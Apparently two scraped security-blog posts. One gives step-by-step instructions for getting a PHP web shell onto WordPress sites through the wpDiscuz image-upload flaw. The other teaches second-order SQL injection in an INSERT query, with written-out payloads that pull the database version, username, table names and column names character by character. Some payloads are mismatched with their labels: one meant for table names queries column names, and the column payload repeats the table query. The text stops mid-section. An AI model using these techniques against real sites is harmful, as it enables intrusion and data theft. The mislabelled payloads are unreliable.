Today i was going through Twitter and in one of the Tweet, I got to know about the vulnerability in "Wordpress wpDiscuz plugin". This vulnerability is discovered by <a href="https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/" target="_blank">Wordfence Team</a>. <br />
<br />
Vulnerability is simple and can be exploited if user has permission to upload image as attachment.<br />
Plugin is just checking for file "Magic Number" and not performing any check for file extension.<br />
<br />
Here an attacker can take advantage to perform "Remote Code Execution" by following below mentioned steps:<br />
<br />
<b>Step 1:</b> Rename image file to .php extension file<br />
<br />
<b>Step 2: </b>open renamed file in text editor, append PHP code in the end of the file and save it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSArSuDJjG7g86tXM0kwYNXwsglD7ibyHOuQvrcCMtnB-Glfuw7aAD7RijlAZ5yCqGq5ikN56cumBfvjZ0fEWB9h2y3AmIPZrkCpo207hMbYeRFhTqIwdMrSYezuCx3K4h583uYoEMKU8/s1600/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="626" data-original-width="1106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSArSuDJjG7g86tXM0kwYNXwsglD7ibyHOuQvrcCMtnB-Glfuw7aAD7RijlAZ5yCqGq5ikN56cumBfvjZ0fEWB9h2y3AmIPZrkCpo207hMbYeRFhTqIwdMrSYezuCx3K4h583uYoEMKU8/s1600/2.png" /></a></b></div>
<br />
<br />
<b>Step 3: </b>Go to website comment section and click to comment in comment box.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDE1Pjvqvh4Xa5F3ZPNPYQFFmPdKPcg27UYR3x5jyTQWnMjz-cvz5kuiBUBk-AZw_sby6ilj-4OFOnr86GZWhoczlmDqj8duuVV80seomV64aeLWPH_67mbdHlcxIyYbBeURBK-fGa7Ik/s1600/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="860" data-original-width="1512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDE1Pjvqvh4Xa5F3ZPNPYQFFmPdKPcg27UYR3x5jyTQWnMjz-cvz5kuiBUBk-AZw_sby6ilj-4OFOnr86GZWhoczlmDqj8duuVV80seomV64aeLWPH_67mbdHlcxIyYbBeURBK-fGa7Ik/s1600/1.png" /></a></div>
<br />
<b>Step 4: </b>Web application comment box will have option for image file attachment. Click the icon to browse the file which we modified in step 2.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj59-HvScyVqhbeemSq_Mb2_rPXjmjy9nSubVylO-Oc5ohvUJmWNLEfEDtfMAzDl4NAM2die9A5qtYL5S2cU6YMoD2ZuZ1qsJpf2mNLVPy6YCXpRbF_YsTjMgD70ttrT6gx98ZD4cQzCoY/s1600/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="1000" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj59-HvScyVqhbeemSq_Mb2_rPXjmjy9nSubVylO-Oc5ohvUJmWNLEfEDtfMAzDl4NAM2die9A5qtYL5S2cU6YMoD2ZuZ1qsJpf2mNLVPy6YCXpRbF_YsTjMgD70ttrT6gx98ZD4cQzCoY/s1600/3.png" /></a></div>
<br /><b>Step 5: </b>Fill the form with relevant information and post the comment.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLS5m4GqXrW9MYmstsRlHO7lO_UkpFwJ9CkNFGqIiOfSQSYeCdy8ihtxXxqj7QF_fC0erJspzl4vQMDK8s8Yt1SAPtxMcATEOZAxkWMalxkXdqqgSnfiWT1Lt6Exu1t2IH7udkMb8wv0s/s1600/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="651" data-original-width="1217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLS5m4GqXrW9MYmstsRlHO7lO_UkpFwJ9CkNFGqIiOfSQSYeCdy8ihtxXxqj7QF_fC0erJspzl4vQMDK8s8Yt1SAPtxMcATEOZAxkWMalxkXdqqgSnfiWT1Lt6Exu1t2IH7udkMb8wv0s/s1600/4.png" /></a></div>
<br />
<b>Step 6: </b>Web application will show the uploaded attached image file. Copy the image file URL.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi16iy_8yCfetQKaftZAjF6X5BPsECVvtZB_3eBoYugr3Y9Pp3gAs79R4TUtE9sU-ufuMV87Ha0mVPddsNR6tafYjTyqas1mPGru11sCBq8SAQl8HV8OFOhsyM7fNsz2DjbKj37aR_zSkY/s1600/5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="621" data-original-width="1102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi16iy_8yCfetQKaftZAjF6X5BPsECVvtZB_3eBoYugr3Y9Pp3gAs79R4TUtE9sU-ufuMV87Ha0mVPddsNR6tafYjTyqas1mPGru11sCBq8SAQl8HV8OFOhsyM7fNsz2DjbKj37aR_zSkY/s1600/5.png" /></a></div>
<br /> <b>Step 7: </b>In copied URL, remove the "-" symbol and image file dimension (it will be in the end) before .php extension.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9RIM_WjK_IvCHjCD3LXfGWvmML1UGTfqwNIksasMyNslOSTcK-Klt2qt3NvJee8XdNxzIx-WxEmg8Bt3scIkTIP8qtw5sCRwcQnYjjHF1FdryzmbEAbc2MmHz-H98n2Je5_J_GYbXOo/s1600/6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="110" data-original-width="1069" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9RIM_WjK_IvCHjCD3LXfGWvmML1UGTfqwNIksasMyNslOSTcK-Klt2qt3NvJee8XdNxzIx-WxEmg8Bt3scIkTIP8qtw5sCRwcQnYjjHF1FdryzmbEAbc2MmHz-H98n2Je5_J_GYbXOo/s1600/6.png" /></a></div>
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaiumZKputJ6UmAejsr1SkuBWQH4D56p5nPZkCP6aH0Jhy68dsNUzE-_YlMri0NZxFbuYmbI7bBJYpaCwRVlv7m3CLMZa1bTBxFChQHiwvgWfCkm3dZVeHCW9UznugpmzzC1Cp1SPfQBU/s1600/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="231" data-original-width="1226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaiumZKputJ6UmAejsr1SkuBWQH4D56p5nPZkCP6aH0Jhy68dsNUzE-_YlMri0NZxFbuYmbI7bBJYpaCwRVlv7m3CLMZa1bTBxFChQHiwvgWfCkm3dZVeHCW9UznugpmzzC1Cp1SPfQBU/s1600/7.png" /></a></div>
<br /><br />
<b>Step 8: </b>Browse the URL and we have access to web shell. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy_MmQS41laCRhEWSeUzHPiRjG7JLs2kPF4MAakSKtGNLd2Izgr7-LcN-DU6-GiphcJi1LtBibm0CySimgfOS3S-aJ0nSEDVjh1kFzXBqjhxkUlKkmj0sWVB2sJxop7tVqjFKjjZjklnQ/s1600/8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="689" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy_MmQS41laCRhEWSeUzHPiRjG7JLs2kPF4MAakSKtGNLd2Izgr7-LcN-DU6-GiphcJi1LtBibm0CySimgfOS3S-aJ0nSEDVjh1kFzXBqjhxkUlKkmj0sWVB2sJxop7tVqjFKjjZjklnQ/s1600/8.png" /></a></div>
<br />
Thanks for reading.<br />
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-36844531648143819332020-04-19T20:51:00.002+05:302023-11-23T10:34:11.870+05:30Exploiting SQL Injection in insert query - Second order SQL injection<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
Today we are going to discuss about SQL Injection exploitation scenario in which there is only one user controlled input parameter and value is getting pass to Insert SQL query.<br />
In this case, the column in which user supplied data is getting save, is the last one and user can not specify the extra column.<br />
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">Description:</span></span></h2>
SQL query which is vulnerable to SQL injection, has following attributes:<br />
<br />
Table name: exploit_list<br />
Columns name: ID, date and vulnerability<br />
<br />
SQL insert query which has been implemented in code:<br />
<textarea cols="50" rows="2" style="height: 30px; width: 789px;">insert into exploit_list(date,vulnerability) values('date("F j, Y, g:i a")','user_supplied_data') </textarea><br />
Here, attacker can control value for the column "vulnerability".<br />
<br />
In the above scenario, we have 2 restrictions:<br />
<ol style="text-align: left;">
<li>Application code has SQL Injection in "Insert query" but not showing any SQL server error. Due to this type of code implementation, attacker can not exploit SQL Injection using "Error based SQL Injection" technique.</li>
<li>User controlled data is getting pass to the column name which is specified in the end of SQL query and attacker can not override the columns </li>
</ol>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">Attack outline:
</span></span></h2>
To exploit the SQL Injection, following trick can help:<br />
<ol style="text-align: left;">
<li>close the data limiter (single quote)</li>
<li>use concatenation operator (+ in this case because I am performing on MySQL server)</li>
<li>Use substring function to grab the data character-by-character</li>
<li>convert the grabbed character to ASCII form</li>
<li>use concatenation operator (+ in this case because I am performing on MySQL server)</li>
<li>close the data limiter (single quote) </li>
<li>Access the web page where application showing the user supplied inserted data. </li>
</ol>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">Application working:
</span></span></h2>
Web application has interface which allow user to insert the data to database.<br />
Also, user can view the inserted data via functionality "Vulnerability List".<br />
<br />
Here is the source code and database dump file <a href="https://github.com/incredibleindishell/insert_SQLI" target="_blank">https://github.com/incredibleindishell/insert_SQLI</a><br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">1. Extracting the SQL server version</span></span></h2>
To extract the SQL server version, below mentioned payload will help:<br />
<textarea cols="20" rows="1" style="height: 28px; width: 150px;">0'+ version() +'0</textarea><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAf5CzjVIh3n7SilBPvC8RIRSph6qoxi9zIgQjkbHRniM7rRshNncKZU1yYcn4-nL3tWDdQ9PM-dJqM4mymPTgJGej4QBQQDNIkV-_2Ol5b7y-8CT9ywQrl64N3xTpVPXmGF0XC_XMzoI/s1600/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="376" data-original-width="820" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAf5CzjVIh3n7SilBPvC8RIRSph6qoxi9zIgQjkbHRniM7rRshNncKZU1yYcn4-nL3tWDdQ9PM-dJqM4mymPTgJGej4QBQQDNIkV-_2Ol5b7y-8CT9ywQrl64N3xTpVPXmGF0XC_XMzoI/s1600/3.png" /></a></div>
<br />
Visit the module which is showing the list of added entries. The column in which user supplied data is getting pass, injected SQL Injection payload has been executed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiewtC2Xxrv_uueQETrS0Pj0irHuQX7oMNrk2ZNH_bBbZWSmYM3s8_uSgzK0Kb5AqdQjEML3DbDVPr-jTD7Em0tPdGKWdcdqxrf1K5F4YkPlTv9CACviFkGg414F4YlXJWRHDB78pIP6dw/s1600/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="161" data-original-width="992" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiewtC2Xxrv_uueQETrS0Pj0irHuQX7oMNrk2ZNH_bBbZWSmYM3s8_uSgzK0Kb5AqdQjEML3DbDVPr-jTD7Em0tPdGKWdcdqxrf1K5F4YkPlTv9CACviFkGg414F4YlXJWRHDB78pIP6dw/s1600/4.png" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">2. Extracting the length of the current SQL server username:</span></span></h2>
To extract the length of the current SQL server user name which is configured in web application, below mentioned payload will help: <br />
<textarea cols="20" rows="1" style="height: 26px; width: 170px;">0'+length(user())+'0</textarea><br />
<b></b>
<b> </b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifGLwYTHJmzvlneVxC0E08lLX0BPl2vJdgoUtxlxsxyv32MJbAQEpVRZgpo5VXe_GTtFHsYF1cvzUIg5VCjEtNaaIFYXfC1-_1bWseXqerCcxZdyhdpXwQxNHzo_f1JM-neCUxg_ddJBk/s1600/5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="774" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifGLwYTHJmzvlneVxC0E08lLX0BPl2vJdgoUtxlxsxyv32MJbAQEpVRZgpo5VXe_GTtFHsYF1cvzUIg5VCjEtNaaIFYXfC1-_1bWseXqerCcxZdyhdpXwQxNHzo_f1JM-neCUxg_ddJBk/s1600/5.png" /></a></div>
<br />
Now, web application executed the SQL Injection payload and attacker can get the output. In this case, length of current SQL server user name is 14 (root@localhost) <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggQ09EzGFqkON9XdqKOQJDxoMpRlGYQ3frCnbwHrptC3ymeMi0VXkBuhfScee4ULuOwHcsFXJbd9TAQg55V25XueQgxQsdZBRhG_4ACssrhOQOj8S6FaoupO7jkaR-CLmSvDx6Htw9iKM/s1600/6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="131" data-original-width="1105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggQ09EzGFqkON9XdqKOQJDxoMpRlGYQ3frCnbwHrptC3ymeMi0VXkBuhfScee4ULuOwHcsFXJbd9TAQg55V25XueQgxQsdZBRhG_4ACssrhOQOj8S6FaoupO7jkaR-CLmSvDx6Htw9iKM/s1600/6.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">3. Exacting the SQL server username:</span></span></h2>
<div style="text-align: left;">
To extract the first character of the SQL server user name, below mentioned payload will help:</div>
<div style="text-align: left;">
<textarea cols="20" rows="1" style="height: 24px; width: 285px;">0'+ascii(substring(user(),1,1))+'0</textarea>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLlRPbHq2UWh2d24aNFkQ_e1QV9fPondAObloYJwyJls71CtZkeOGeN3LtiFWhLGszohT9cr2jrR74QO2wQEMMOheUkIHD3XLk8Jx_MK9jnOT_ssTmsr-Qs-xQub0JAcV-EMJf9yS4OUc/s1600/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="887" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLlRPbHq2UWh2d24aNFkQ_e1QV9fPondAObloYJwyJls71CtZkeOGeN3LtiFWhLGszohT9cr2jrR74QO2wQEMMOheUkIHD3XLk8Jx_MK9jnOT_ssTmsr-Qs-xQub0JAcV-EMJf9yS4OUc/s1600/7.png" /></a></div>
<br />
Web application executed the payload and showing the ASCII representation (114) of alphabet 'r'. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisW7Xl9UjAuuAmbzLcm9xPOJ_xXxv-xgHtWcqtySlSm2Ch9easKvYS_3VULmztz10E79zZzsKA0L9CtfNmhdyPBhSY3dfguGI88Y3Ie09QDxZX_ehMBGfnEeQ-r2Q-VdcLdHtsv1FH9V4/s1600/8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="139" data-original-width="1084" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisW7Xl9UjAuuAmbzLcm9xPOJ_xXxv-xgHtWcqtySlSm2Ch9easKvYS_3VULmztz10E79zZzsKA0L9CtfNmhdyPBhSY3dfguGI88Y3Ie09QDxZX_ehMBGfnEeQ-r2Q-VdcLdHtsv1FH9V4/s1600/8.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
To extract the second character, we just need to increment the value of second parameter. Payload will be:<br />
<textarea cols="20" rows="1" style="height: 25px; width: 295px;">0'+ascii(substring(user(),2,1))+'0</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxkoNRKIGBPU9DMarTGWlWk93i85dD_XRqJj7CpMQnHFHbCbAbnkFuWuPWp-O0JNinKl6i9RTY8-jFGTI_XyGFzk81tQ1QsX0N6vXkOK2m5GIWC9kgrxBNdZoXQeNtZvzSgqIk2MccCaM/s1600/9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="231" data-original-width="884" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxkoNRKIGBPU9DMarTGWlWk93i85dD_XRqJj7CpMQnHFHbCbAbnkFuWuPWp-O0JNinKl6i9RTY8-jFGTI_XyGFzk81tQ1QsX0N6vXkOK2m5GIWC9kgrxBNdZoXQeNtZvzSgqIk2MccCaM/s1600/9.png" /></a></div>
<br />
Web application executed the SQL Injection payload and showing that the second character of SQL server user name is "111" which is ASCII representation of alphabet "o".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikPK1fB_KoWUCbNj6RMz3h66Yn0iL6nO4KFD7FyhQWfC75jTQ7d7OYT12ETugh61BYeKnJiV55Qjj5TPScbgLl822HeS-Q1GGlSpmio2-ENt3Sdu6LO5-PAGHESp26kFNAGT_etjPD_9U/s1600/10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="109" data-original-width="1133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikPK1fB_KoWUCbNj6RMz3h66Yn0iL6nO4KFD7FyhQWfC75jTQ7d7OYT12ETugh61BYeKnJiV55Qjj5TPScbgLl822HeS-Q1GGlSpmio2-ENt3Sdu6LO5-PAGHESp26kFNAGT_etjPD_9U/s1600/10.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">4. Extracting the name of the table in current database:</span></span></h2>
Before proceeding to extract the table name via web application interface, lets confirm by executing the SQL query in SQL server console.<br />
In current database, we have 3 tables and first table is "exploit_list". during table name extraction, this is the table which will be extracted by out SQL injection payload. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1gz6Vt3vU6AjrPzdClK090V4CyLHgbx-s0g89ByKm8T7yxLiniG5CNbPu8t4_VsFjwD0n-6tTz7u3w9PZmh3IrJvPY9r3kUFQvIE8CwY7Qo60B5MczubqnBFtTqlvbIYMlwkY44pRuQo/s1600/11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="338" data-original-width="1381" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1gz6Vt3vU6AjrPzdClK090V4CyLHgbx-s0g89ByKm8T7yxLiniG5CNbPu8t4_VsFjwD0n-6tTz7u3w9PZmh3IrJvPY9r3kUFQvIE8CwY7Qo60B5MczubqnBFtTqlvbIYMlwkY44pRuQo/s1600/11.png" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">4.1 Payload to extract the first character of the first table name in current database: </span></span></h3>
</div>
<div style="text-align: left;">
The payload to extract the table name first character will be like this:</div>
<div style="text-align: left;">
<textarea cols="20" rows="1" style="height: 27px; width: 978px;"> 0'+ ascii(substring( (select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))+ '0 </textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPocxSFleErqfvTYIvnXFVaOG75l4ld4W1j2UPzujFQ07ABSi7TVJ6q9T6cxAnG4AZ7n0spm_qqGS9vWsWdflFcnov-wRTlC2xfU5REGXf8xa7XTr-4OlmuO6zbbFcTV1UXibqbtlCV5E/s1600/12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="1146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPocxSFleErqfvTYIvnXFVaOG75l4ld4W1j2UPzujFQ07ABSi7TVJ6q9T6cxAnG4AZ7n0spm_qqGS9vWsWdflFcnov-wRTlC2xfU5REGXf8xa7XTr-4OlmuO6zbbFcTV1UXibqbtlCV5E/s1600/12.png" /></a></div>
<br />
Now, web application web page is showing the first character of the table name in ASCII representation. Here, web application showing "101" which is ASCII representation of alphabet "e".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYfP3DTE06lLq62XX7Ysnu2t1Gw2wqOzdjQj4l_RDvO14cHqgcQ6fiGUrkPGzblAtqLG8ljpHG9ja3bqOJLfeQAgFoRgWC4GOiQCSAeZ4KjeeCC6HwF6TBQMxbiZ6V0V-sNSqcF5sEqE/s1600/13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="80" data-original-width="1121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYfP3DTE06lLq62XX7Ysnu2t1Gw2wqOzdjQj4l_RDvO14cHqgcQ6fiGUrkPGzblAtqLG8ljpHG9ja3bqOJLfeQAgFoRgWC4GOiQCSAeZ4KjeeCC6HwF6TBQMxbiZ6V0V-sNSqcF5sEqE/s1600/13.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Increment the second parameter value of "substring" function to extract the table name second character:<br />
<br />
<textarea cols="20" rows="1" style="height: 20px; width: 1014px;"> 0'+ ascii(substring( (select column_name from information_schema.columns where table_name='exploit_list' limit 0,1) ,2,1))+ '0 </textarea>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMvALHND6TuNohg2hrGNq5Yt0UdfffG8QJ_F5vauxXt0uQ1hHauKjxsTDUXBq9jAN3EoRv5GiAYkgMg1Cyi0Bhae2PHN30LSocETH7GFWpTwJMH6gSwb0Vhl89SzsEIdWOLB72xH4mWnY/s1600/14.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="1072" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMvALHND6TuNohg2hrGNq5Yt0UdfffG8QJ_F5vauxXt0uQ1hHauKjxsTDUXBq9jAN3EoRv5GiAYkgMg1Cyi0Bhae2PHN30LSocETH7GFWpTwJMH6gSwb0Vhl89SzsEIdWOLB72xH4mWnY/s1600/14.png" /></a></div>
<br />
Web application showing that the second character of table name is "120" which is ASCII representation of alphabet "x". <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQIHVwugUotTKRl4uNAahz4w3xGK-SiM7XfPT55hQqcyLc6Bqi5KiygKEEms6_IjktpfKtHvDgK5BhSk1e4rx3ZU5iFDNh_kRy6CiZT8pTvSJ-qf6HMtJf9si5uiGc0Z33nOuaikklsSM/s1600/15.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="128" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQIHVwugUotTKRl4uNAahz4w3xGK-SiM7XfPT55hQqcyLc6Bqi5KiygKEEms6_IjktpfKtHvDgK5BhSk1e4rx3ZU5iFDNh_kRy6CiZT8pTvSJ-qf6HMtJf9si5uiGc0Z33nOuaikklsSM/s1600/15.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
And to extract the rest of the character of table name, user just need
to keep increment the value of substring() second parameter. <br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">5. Extracting the column name for specific table in current database:</span></span></h2>
In current database, we have table "exploit_list" in which first column is "ID". During column name extraction from table "exploit_list", this is the column which
will be extracted by out SQL injection payload.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTjwAGLUUrN-Low9_5uKZt6QypR4Gaonxox-Zcu4ov19_u1sKejkCU3MeHGnS9kI-E3pbDuLHJJjiKum-UyDE6dgjCPLRV7T9VzIkt-stFeJ3C0A99D5jEUKlarc6pAl-bVX77uYnZf3w/s1600/16.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="192" data-original-width="1444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTjwAGLUUrN-Low9_5uKZt6QypR4Gaonxox-Zcu4ov19_u1sKejkCU3MeHGnS9kI-E3pbDuLHJJjiKum-UyDE6dgjCPLRV7T9VzIkt-stFeJ3C0A99D5jEUKlarc6pAl-bVX77uYnZf3w/s1600/16.png" /></a></div>
<br />
<div style="text-align: left;">
<h3 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">5.1 Payload to extract the first character of the first column in table "exploit_list": </span></span></h3>
The payload to extract the column name first character from table "exploit_list" will be like this:</div>
<textarea cols="20" rows="1" style="height: 27px; width: 978px;"> 0'+ ascii(substring( (select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))+ '0 </textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
